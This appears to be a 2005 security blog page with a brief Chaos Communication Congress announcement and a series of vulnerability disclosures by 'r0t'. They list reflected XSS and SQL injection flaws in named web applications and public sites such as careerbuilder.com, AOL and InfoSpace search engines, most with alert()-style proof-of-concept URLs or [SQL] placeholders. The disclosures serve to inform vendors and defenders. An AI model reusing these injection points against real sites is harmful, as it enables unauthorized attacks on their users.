The Chaos Communication Congress is the annual congress of the Chaos Computer Club e.V. (CCC). The Congress has established itself as the "European Hacker Conference" bringing in people from all over Europe and even further away.

The congress not only addresses the techno geek but also those who are interested in appliances and aftermathes. A part of the lectures will be held in English, the rest in German. The language used for each lecture is clearly marked in the conference program.

http://events.ccc.de/congress/2005/



If you are from Germany or from europa i think you must know CCC, i will be there just to chilin and meet friends, so last meeting point in this year will be in Berlin!

MyTemplateSite XSS vuln.

MyTemplateSite XSS vuln.
Vuln. dicovered by : r0t
Date: 3 dec. 2005
vendor:http://www.infinetsoftware.com/products/mts/default.asp
affected version: 1.2 and prior

Product Description:
Create your own template site with MyTemplateSite. MyTemplate site is an out-of-the-box, full featured template site solution. The software handles management, publishing, ordering, and secure downloading. Seamless PayPal/2Checkout integration.

Vuln. Description:
Input passed to the "q" parameter in "search.asp" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site


Solution:
Edit the source code to ensure that input is properly sanitised.

ASPS Shopping Cart Professional and Lite XSS vuln

ASPS Shopping Cart Professional and Lite XSS vuln
Vuln. dicovered by : r0t
Date: 3 dec. 2005
Vendor:http://www.aspsolutions.com.au/
affected version:
ASPS Shopping Cart Professional 2.9d and prior
ASPS Shopping Cart Lite V2.1 and prior


Product Description:
Developed using asp/vb scripting – full source code supplied without encryption , complete cms, helpdesk to log enquires, Unlimited number of categories/subcategories, products and currencies , Innovative Studio online browser , No dll's to install , Supports access 2000 or above (sql server v7+ will be available by 30th April - If you require this urgently please email us as we can sell you our current version which is close for release). , Easy to alter language files and template design , Supports most ssl certificates (please let us know if your certificate is not supported as we aim to support as many as we can) , Credit card details encrypted for added security , Multiple super administrators and standards administrators , Reward your clients sale points which can be used for purchasing , Invoice your clients using your shopping cart for a payment methods including recurring payments (great for hosting invoices) , Create promotional discount coupons for clients. optional - add web wiz forum to cart



Vuln. Description:
Input passed to the "srch_product_name" parameter in "adv_search.asp" and "b_search" parameter in "bsearch.asp" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


example:
/products/adv_search.asp?srch_product_name=
%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript
%3E&srch_product_price1=&srch_product_price2=
&srch_product_stocknumber=&srch_product_cate
gory=&advance_submit=Search


/products/bsearch.asp?b_search=%3Cscript%3Ea
lert%28%27r0t%27%29%3C%2Fscript%3E&x=12&y=7


Solution:
Edit the source code to ensure that input is properly sanitised.

Solupress News XSS vuln

Solupress News XSS vuln
Vuln. dicovered by : r0t
Date: 3 dec. 2005
Vendor:http://www.inspironetworks.com/solupress/solupress_news.html
affected version:1.0 and prior

Product Description:
Solupress News is a comprehensive online news publishing system. Place news and events online easily, without the need for expensive web developers. Articles can have images, audio, video, and indeed any other type of file uploaded with them. The output is what you'd expect from a professional news web site like the nytimes.com or the latimes.com. The AutoActivation feature in Solupress automatically posts your articles online on the date you specify, so you can have your news web site maintain itself while you're on vacation. In addition, a WAP interface allows mobile device users with Internet access to view news, scores, and events on their devices. Solupress works with either a SQL Server or MS Access database.

Vuln. Description:
Input passed to the "keywords" parameter in "search.asp" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


example:
/search.asp?option=simple&keywords=%3Cscript
%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&submit1=Find


Solution:
Edit the source code to ensure that input is properly sanitised.

SiteBeater MP3 Catalog XSS vuln

SiteBeater MP3 Catalog XSS vuln
Vuln. dicovered by : r0t
Date: 3 dec. 2005
vendor:http://www.sitebeater.com/Radio/
affected version: 2.03 and prior


Product Description:
MP3 upload, lightning fast ID3 tag reading or enter your own song data, CD purchase info, search, private, public or random playlists, multi-domain, load-balancing, multi-lingual, mailing lists, themes, user management, over 50 rights, and much more! Uses ASP & MSSQL.



Vuln. Description:
Input passed to the parameters in "Search.asp" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.



Solution:
Edit the source code to ensure that input is properly sanitised.

Sitebeater News System XSS vuln.

Sitebeater News System XSS vuln.
Vuln. dicovered by : r0t
Date: 3 dec. 2005
Vendor:http://www.sitebeater.com/News/
affected version: 4.00 and prior

Product Description:
News Features: mailing lists, polls, themes, attachments, search, categories, related article links, send to friends, discuss article, independent editors, more! Uses ASP & MSSQL. Also includes all of this: Portal creation system and user management, polls, mailing lists, themes, macros, account groups, user profiling, custom rights, API, more! Available plug-ins include: Message Board, Image Gallery, MP3 Catalog and News Systems. Uses ASP & MSSQL. User Management System, polls, mailing lists. Features: cross-domain user management, sharing of user data across domains, custom user rights, group management, unlimited profiling, API, more! Uses ASP & MSSQL Complete image display system for your website. Requires ASP & MSSQL. Includes dynamic creation of thumbnails, image upload, locked galleries, .zip or ftp bulk import, unlimited categories, more. With unlimited expandability, flexibility and power, the SiteBeater Message Board is your complete user friendly solution. Message Board features: mailing lists, polls, powerful administration, file attachments, color themes, multi-lingual, multiple views, search, user preferences, send-to-friends, print preview, alert administrator, profanity filter, sorting, rating, more! Uses ASP & MSSQL. MP3 upload, lightning fast ID3 tag reading or enter your own song data, CD purchase info, search, private, public or random playlists, multi-domain, load-balancing, multi-lingual, mailing lists, themes, user management, over 50 rights, and much more! Uses ASP & MSSQL.


Vuln. Description:
Input passed to the search module "Keywords" parameter isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


example:

/ArticleDisplay/Archive.asp?DOMAIN_Link=&sSort=SubmitDate
&iSearchID=389&sKeywords=%3Cscript%3Ealert%28%27r0t%27%29
%3C%2Fscript%3E

Solution:
Edit the source code to ensure that input is properly sanitised.

careerbuilder.com XSS vuln.

careerbuilder.com XSS vuln.

Vuln. dicovered by : r0t
Date: 2 dec. 2005


Vuln. Description:
Input passed to the search parameters in "JobResults.aspx" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

example:
/JobResults.aspx?S%3Asbkw=%3Cscript%3Ealert%
28%27r0t+llove+XSS%27%29%3C%2Fscript%3E&S%3
Asbcn=%3Cscript%3Ealert%28%27r0t+llove+XSS%
27%29%3C%2Fscript%3E&S%3Asbsn=ALL&S%3Asbfr=
30&S%3Asbsbmt=Search&cid=US&IPath=ILKG&excr
it=QID%3DA6652282763367%3Bst%3DA%3Buse%3DAL
L%3BrawWords%3D%3Cscript%3Ealert%28%27r0t+l
loves+XSS%27%29%3C%2Fscript%3E%3BTID%3D0%3B
CTY%3D%3Cscript%3Ealert%28%27r0t+lloves+XSS%
27%29%3C%2Fscript%3E%3BSID%3DALL%3BCID%3DUS
%3BENR%3DNO%3BDTP%3DDR3%3BYDI%3DYES%3BIND%3
DALL%3BPDQ%3DAll%3BJN%3DAll%3BPAYL%3D0%3BPA
YH%3DGT120%3BPOY%3DNO%3BETD%3DALL%3BRE%3DALL
%3BMGT%3DDC%3BSUP%3DDC%3BFRE%3D30%3BCHL%3DA
L%3BQS%3DSID_UNKNOWN%3BSS%3DNO%3BTITL%3D0%3
BJQT%3DRAD%3BEXJT%3D%3Cscript%3Ealert%28%27
ll%27%29%3C%2Fscript%3E

icq.com XSS vuln.

icq.com XSS vuln.

Vuln. dicovered by : r0t
Date: 2 dec. 2005

Vuln. Description:
Input passed to the "uSearchString" parameter in "search_results.php" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


example:
/boards/search_results.php?uSearchString=
%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E

Solution:
Edit the source code to ensure that input is properly sanitised.

Confluence – the Enterprise Wiki, XSS vuln.

Confluence – the Enterprise Wiki, XSS vuln.
Vuln. dicovered by : r0t
Date: 2 dec. 2005
Vendor:http://www.atlassian.com/software/confluence/
affected version: 2.0.1 Build:#321 Nov 28, 2005

Product Description:
Confluence is an enterprise wiki that makes it easy for your team to collaborate and share knowledge. Confluence - The Enterprise Wiki.Adding, sharing and finding content has never been easier.
These benefits come with all the additional features needed to make it a part of your business:

* Enterprise security
* Simple installation and management
* Attractive, user-friendly interface
* Powerful tools for structuring and searching your wiki
* Professional features such as PDF export and automated refactoring
* An open API for extension and integration
* Atlassian's Legendary Service.


Vuln. Description:
Input passed to the search module parameters isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Solution:
Edit the source code to ensure that input is properly sanitised.

JSE XSS vuln.

Java Search Engine XSS vuln.

Vuln. dicovered by : r0t
Date: 2 dec. 2005
Vendor:http://www.me.lv/jse/index.html
affected version:0.9.34

Product Description:
Java Search Engine is a server-side search engine program for web sites. Search engines provide to the site visitors easy and fast way to find what they want on your site. If you want to have search engine on your site - you can try Java Search Engine. It is easy, just follow instructions on this page.
Java Search Engine has common Java API interfaces such as JSP, servlets and EJB. Can save results as XML and transform them into HTML using XSLT stylesheets.
Java Search Engine is a complete solution, you don't have to to create crawler for it, you don't have to to install or integrate it with any database if you don't want, you don't have to use any other additional software (except JDK of course). This search engine is familiar to your visitors - it has the same query language and output interface as Google.

Vuln. Description:
Input passed to the "q" parameter in "search.jsp" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

example:
/search.jsp?oe=english&q=%3Cscript%3Ealert
%28%27r0t%27%29%3C%2Fscript%3E&qor=

Solution:
Edit the source code to ensure that input is properly sanitised.

QualityPPC XSS vuln.

QualityPPC XSS vuln.

Vuln. dicovered by : r0t
Date: 1 dec. 2005
Vendor:http://www.qualityebiz.com/main/qppc.php
affected version:1553 and prior

Product Description:
QualityPPC has the latest technology which offers you more potentials to generate revenue. All future upgrades are free and continue. Current Features, 35+ Pre-installed XML feed, Country filter for local/xml traffic, listing by indexing or rotation, multiple member type for your affiliate, Support PayPal, Egold, and MoneyBooker, Online Elite proxy finder, and many option setting which can be flexibly fit to your business preferances. you get everything in a reasonable price.


Vuln. Description:
Input passed to the parameters in search module isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Solution:
Edit the source code to ensure that input is properly sanitised.

Free ClickBank Search Engine SQL inj. vuln.

Free ClickBank Search Engine SQL inj. vuln.

Vuln. dicovered by : r0t
Date: 1 dec. 2005
Vendor:http://phpfreebies.com/free-clickbank-search-engine-script.php
affected version:1.0 and prior


Product Description:

Free PHP/MySQL script allows you to add the thousands of products from the Clickbank® Marketplace directory to your website with your affiliate nickname. This will allow you to earn up to 75% commission per sale on each and every one. Feel free to download and use this script on any website.


Vuln. Description:

Input passed to the "keywords" parameter in "search.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/search.php?keywords=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Interspire FastFind 2005 XSS vuln.

Interspire FastFind 2005 XSS vuln.

Vuln. dicovered by : r0t
Date: 1 dec. 2005
Vendor:http://www.interspire.com/fastfind/
affected version: 2005 and 2004 version.

Product Description:
Add powerful, flexible search to your site in minutes. FastFind is the leading PHP search engine, featuring: point and click web based interface, simple 3 step installation wizard, 100% rebrandable, automated scheduling, advanced filtering, and much, much more. Download Interspire FastFind 2005 now and have search setup on yours/your clients site in minutes!


Vuln. Description:
Input passed to the "query" parameter isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

example:
/?query=%3Cscript%3Ealert%28%27r0t%20
love%20XSS%27%29%3C%2Fscript%3E&type=
advanced&results=20&searchType=1

Solution:
Edit the source code to ensure that input is properly sanitised.

InfoSpace® search engines XSS vuln.

InfoSpace search engines are vuln. to XSS attacks.

Vuln. dicovered by : r0t
Date: 1 dec. 2005
Vendor:http://www.infospaceinc.com/
affected version: latest:) There is more than 3 types of search engines and all of them ar vuln.

About Products:
InfoSpace is one of the leading online directory services providers on the Internet. Our award-winning directory sites include Switchboard® and InfoSpace®. Our online yellow page sites are designed to make it easier for users to locate businesses, people and information online, while creating optimal revenue opportunities for advertisers and listings partners, such as Verizon SuperPages, BellSouth, and Dex Media.

InfoSpace's online directory products are uniquely structured and highly interactive to help users quickly and easily locate businesses that satisfy their needs. Besides yellow page listings, they offer a variety of other useful services, including white pages, maps and directions, public records, and more.

InfoSpace's metasearch technology searches the most popular engines including Google, Yahoo!, MSN Search, Ask Jeeves and more, and returns the best results from each.

Metasearch
InfoSpace's branded search sites Dogpile®, WebCrawler®, MetaCrawler® and WebFetch™ make it easy to search more of the Web and find relevant results fast.

By combining the relevancy weightings of multiple engines, InfoSpace metasearch returns the best results the Web has to offer, providing users with a more powerful and comprehensive way to search. In short, metasearch allows users to search up to 50% more of the Web than any single engine.

Because metasearch aggregates results including paid advertising from several sources, each of InfoSpace's branded search sites are better able to monetize search than any single search engine.



Vuln. Description:

InfoSpace search engine parameters isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


Example of InfoSpace Search engines:

http://msxml.webcrawler.com/info.wbcrwl/search/
web/%253Cscript%253Ealert(%2527r0t%252Blloves%2
52BXSS%2527)%253C%252Fscript253E/1/-/1/-/-/-/-/
-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-
/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/417/
top

http://www.metacrawler.com/info.metac/search/web
/%253Cscript%253Ealert(%2527r0t%2Blloves%2BXSS%2
527)%253C%252Fscript253E/1/-/1/-/-/-/-/-/-/-/-/-
/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-
/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/417/top

http://www.dogpile.com/info.dogpl/search/web/%253
Cscript%253Ealert(%2527r0t%252Blloves%252BXSS%252
7)%253C%252Fscript%253E/1/-/1/-/-/-/-/-/-/-/-/-/-
/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/
-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/417/top

http://www.webfetch.com/uk.webfetch/search/web/%2
53Cscript%253Ealert(%2527r0t%2Blloves%2BXSS%2527)
%253C%252Fscript%253E/1/-/1/-/-/-/-/-/-/-/-/-/-/-/
-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/
-/-/-/-/-/-/-/-/-/-/-/-/-/417/top?engineset=uk-onl
y_oando



http://www.switchboard.com/bin/cgiqa.dll?SR=&MEM=1
&QV=24F925BAB8114FE185F3F69AD09FD7A0l02811611743C8
74343313203O01811711743C87434D313203O03872D3DA93C8
74316303203&LNK=14%3A21&F=&L=%3Cscript%3Ealert%28%
27r0t+love+XSS%27%29%3C%2Fscript%3E&T=&S=&Z=&image
1.x=24&image1.y=9


Example in AOL:

http://whitepages.aol.com/_1_2LJMU7R09YLVHU__aolwp.aolw/
white-pages/noresults.htm?kcfg=wpus&otmpl=%2Fwhite-pages
%2Fresults.htm&qfm=n&qk=5&top=internal&qname=%3Cscript%3
Ealert%28%27r0t%2Blove%2BXSS%27%29%3C%2Fscript%3E&qs=&se
archtype=citystate&qn=%3Cscript%3Ealert('r0t+love+XSS')
%3C/script%3E&qf=&qc=

Example on Excite.com
http://msxml.excite.com/info.xcite/search/web/%253Cscript
%253Ealert(%2527r0t%2Blloves%2BXSS%2527)%253C%252Fscript%
253E

Other examples:
http://www.webmarket.com/info.webmkt/results.htm?qkw=%3Cs
cript%3Ealert%28%27r0t%2Blloves%2BXSS%27%29%3C%2Fscript%3E

http://www.classifieds2000.com/_1_W1U7R0GZW8ML__info.cls2k
/classads/results.htm?qkw=%3Cscript%3Ealert%28%27r0t%2Bllo
ves%2BXSS%27%29%3C%2Fscript%3E

http://msxml.infospace.com/_1_2N6MU7R09I3ROK__info.nbci/se
arch/web/%253Cscript%253Ealert(%2527r0t%2Blloves%2BXSS%252
7)%253C%252Fscript%253E



Even Mamma.com is only a partner of InfoSpace, and it aslo have same vuln. type.

example:

http://www.mamma.com/Mamma?qtype=&query=%3Cscript%3
Ealert%28%27r0t+llove+XSS%27%29%3C%2Fscript%3E


Solution:
Edit the source code to ensure that input is properly sanitised.

NetClassifieds all versions SQL inj. vuln

NetClassifieds all versions SQL inj. vuln

Vuln. dicovered by : r0t
Date: 1 dec. 2005
Vendor:http://scriptdevelopers.net/
affected version:
NetClassifieds Premium Edition 1.0.1
NetClassifieds Professional Edition 1.5.1
NetClassifieds Standard Edition 1.9.6.3
NetClassifieds Free Edition 1.0.1


Vuln. Description:

Input passed to the "CatID" parameter in "ViewCat.php" and "gallery.php","ItemNum" parameter in "ViewItem.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


examples:
/ViewCat.php?CatID=[SQL]
/gallery.php?CatID=[SQL]
/ViewItem.php?ItemNum=[SQL]

Solution:

Edit the source code to ensure that input is properly sanitised.

Extreme Search Corporate Edition 6.x XSS vuln.

Extreme Search Corporate Edition 6.x XSS vuln.
Vuln. dicovered by : r0t
Date: 1 dec. 2005
Vendor:http://www.extremecorporate.com/index-new.html
affected version:6.0 and prior

Product Description:
Power your web site with this premium pay per click search engine. This internet software is a combination of fast php code and the very secure perl code. It features an expansive category editor section and seperate affiliate program section.

Vuln. Description:
Input passed to the "search" parameter in "extremesearch.php" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

example:
/search/extremesearch.php?search=%3Cscript%3E
alert%28%27r0t+XSS%27%29%3C%2Fscript%3E&lang=


Solution:
Edit the source code to ensure that input is properly sanitised.

Lore SQL inj. vuln.

Lore SQL inj. vuln.

Vuln. dicovered by : r0t
Date: 1 dec. 2005
Vendor:http://www.pineappletechnologies.com/products/lore/
affected version: Tested on 1.5.4

Product Description:
Lore is a professional knowledge base management system powered by PHP and MySQL.
Lore allows you to quickly and easily organize frequently asked questions, articles, and documentation into a categorized and searchable knowledge base.

Vuln. description:
Input passed to the "id" parameter in "article.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/article.php?id=1[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.